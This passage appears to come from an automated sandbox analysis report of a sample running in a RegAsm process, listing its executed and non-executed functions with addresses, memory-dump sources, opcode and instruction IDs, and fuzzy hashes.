                                                  • Instruction ID: 933ad8d79d5cfc259ee82ce7560927deca7278de3c8e68e4ea9c4039ebda595e
                                                  • Opcode Fuzzy Hash: 99f21b112623f02a4939ab6b5262cd4afebba9a76d20a254151f3aad39a729ed
                                                  • Instruction Fuzzy Hash: F401A236B105295BDB94966CDC257EF7BABABC8310F14857AE41AE7384EF60CD0243D1
                                                  Function 061EED90 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ec4a7996df65e826a8a310734324f06d171446a605fdbe08ac1a140b25d4cb1
                                                  • Instruction ID: cca987db3c0765ccd3cca5271dd6ea4bab4d5cab72450460e5722804f6185c49
                                                  • Opcode Fuzzy Hash: 7ec4a7996df65e826a8a310734324f06d171446a605fdbe08ac1a140b25d4cb1
                                                  • Instruction Fuzzy Hash: DF01FF38B10A105BDB65D93D9855B2FA7DBEBC9720F20883AF20AC7344EF21DC024391
                                                  Function 061EA318 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c86488c35db7b5e32924a08ede08c2a6c0b8b4ff99eb045f89c0c8069203924
                                                  • Instruction ID: 952428faa9c90a688d757f45b03103f35f20d19009afbbee6a840c4cfb5947e4
                                                  • Opcode Fuzzy Hash: 7c86488c35db7b5e32924a08ede08c2a6c0b8b4ff99eb045f89c0c8069203924
                                                  • Instruction Fuzzy Hash: 94013134B10A144BDBA1EA7DD45176FB3D6EB89710F108568E10ACB754EF21DC458791
                                                  Function 00DDD8B1 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676316395.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_ddd000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d7f1936b676a445f773cc8f8b2d57d3e3b9d6b582d1dcfd2405cfcb74af7681
                                                  • Instruction ID: 851fca90895b29e1dc54569dc0436f10a66f6094fa0592d5c8054ace90df6f16
                                                  • Opcode Fuzzy Hash: 4d7f1936b676a445f773cc8f8b2d57d3e3b9d6b582d1dcfd2405cfcb74af7681
                                                  • Instruction Fuzzy Hash: 2A01F271408344AFEB204E22CD84B66BBD8DF40724F1C851BEC495F386C239D840DEB2
                                                  Function 061EC7E0 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e70b026ed6427ed0c2d27fd8c99894053be009fcef1e19bfaf219cc33fe63d8
                                                  • Instruction ID: c6a501fc11fb2f3a2c292cf42e6159f985d56e5b7eed9d70aa962bc16603b240
                                                  • Opcode Fuzzy Hash: 5e70b026ed6427ed0c2d27fd8c99894053be009fcef1e19bfaf219cc33fe63d8
                                                  • Instruction Fuzzy Hash: 1401F431F10224ABDF589A79EC41AAE7366FB85310F004579E915EB344DB31E80487D0
                                                  Function 00DDD8B0 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676316395.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_ddd000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78c690c5eac22b8f5b3d9d3bb424ef834bedf4df894e7f6275414f001de8e813
                                                  • Instruction ID: 644a1b36f56095236f7b6c71c4c2ed9cc3ff3f30876f5acaebc78ef85fa2c3de
                                                  • Opcode Fuzzy Hash: 78c690c5eac22b8f5b3d9d3bb424ef834bedf4df894e7f6275414f001de8e813
                                                  • Instruction Fuzzy Hash: 86F0CD72408344AFEB208E06DD84B62FF98EB40724F1CC45AED485F386C279A844CAB1
                                                  Function 061E6469 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e5b58304e77e08a4e7d54cd14a5ed0148264413f1bdada737433f8a536135b6
                                                  • Instruction ID: b5bb172fb2246656620a815aa506bf975a9d1a4f24a9984be0844cefea35542d
                                                  • Opcode Fuzzy Hash: 3e5b58304e77e08a4e7d54cd14a5ed0148264413f1bdada737433f8a536135b6
                                                  • Instruction Fuzzy Hash: CDE08671E155499BDF90CEB0DE1939B77AAD751204F288CA7E408D7641E23ADE1187C0

                                                  Non-executed Functions

                                                  Function 061E7698 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-1298971921
                                                  • Opcode ID: a98d49957f241b3a732a81e16acaf0a1cd021639fe66dab7d36aea83764a1e82
                                                  • Instruction ID: 28d3bc0eb982b8bb619fb288ba0121fd24028825e87fdbc3bb721254dc84f64b
                                                  • Opcode Fuzzy Hash: a98d49957f241b3a732a81e16acaf0a1cd021639fe66dab7d36aea83764a1e82
                                                  • Instruction Fuzzy Hash: 8E122D34E0061A8FEB68DB65D854B9DB7F2FF89300F2499A9D406AB294DB30DD45CF90
                                                  Function 061EA938 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-3886557441
                                                  • Opcode ID: f113ccc8b9b9dcc7fc6aecbfbf1d0fbe50aab348b5a86d471d682e79b5474a8b
                                                  • Instruction ID: 8269524a40cfea07a34125cf8745588aa48fd7bbad05636d2175622671460075
                                                  • Opcode Fuzzy Hash: f113ccc8b9b9dcc7fc6aecbfbf1d0fbe50aab348b5a86d471d682e79b5474a8b
                                                  • Instruction Fuzzy Hash: 59918030E00B0ADFEB68DB64D9557AE77F2BF84300F158529E801AB2A5DB74DD45CB90
                                                  Function 061E7098 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-2069967915
                                                  • Opcode ID: ce7dc2dda59a65d31fc064b3bc00e071cf91fa33db8541dda13662e689178b8b
                                                  • Instruction ID: 075dea0c0e6eea7fdbf9232cadd3cb617f6816f10b1a9182e12c39c837cca6be
                                                  • Opcode Fuzzy Hash: ce7dc2dda59a65d31fc064b3bc00e071cf91fa33db8541dda13662e689178b8b
                                                  • Instruction Fuzzy Hash: 0BF15E34A00709CFEB59EBA4D454B6EB7B2FF84300F248469E4059B3A9DB35EC42CB91
                                                  Function 061E83D0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: ce7255e3df5c2923fec7919965f3066bd2686b6413deed51ddf6c725adec1d72
                                                  • Instruction ID: 18c07952a55ed6b8a7d120e3262204fa2d51870488c9f9762ae9148853e627b1
                                                  • Opcode Fuzzy Hash: ce7255e3df5c2923fec7919965f3066bd2686b6413deed51ddf6c725adec1d72
                                                  • Instruction Fuzzy Hash: A4B15E34F106098FDBA4EB69D5947AEB7B2FF84300F248869E4069B355DB34DC82CB91
                                                  Function 061E87E8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LRq$LRq$$q$$q
                                                  • API String ID: 0-2204215535
                                                  • Opcode ID: 1724473531dd2f29dc2c89cb99b5d46872e6af64a8ef97e8edce2b2aee0d958a
                                                  • Instruction ID: ae51f066c3e0a3f13eea113444ea1a12055d11d822f09556fd71919383668ea3
                                                  • Opcode Fuzzy Hash: 1724473531dd2f29dc2c89cb99b5d46872e6af64a8ef97e8edce2b2aee0d958a
                                                  • Instruction Fuzzy Hash: 5851C134B00A019FDB98EB78D851A6E77E2FF85310F1489A9E8019F3A5DB30EC45CB95
                                                  Function 061EACC0 Relevance: 5.2, Strings: 4, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: 48d8cc809611ffe7f4e43fa5a8dd7792f763ed1d339d339b358007e6d713f928
                                                  • Instruction ID: e1fb9b5d3f2e43289e2d6ca405ba6cad200e6f86dd19e34593ca5e0af2c5951c
                                                  • Opcode Fuzzy Hash: 48d8cc809611ffe7f4e43fa5a8dd7792f763ed1d339d339b358007e6d713f928
                                                  • Instruction Fuzzy Hash: 1C51BE34E10A049FDF65DB64E5906AEB3B2FF84311F14896AE806EB355DB30EC42CB91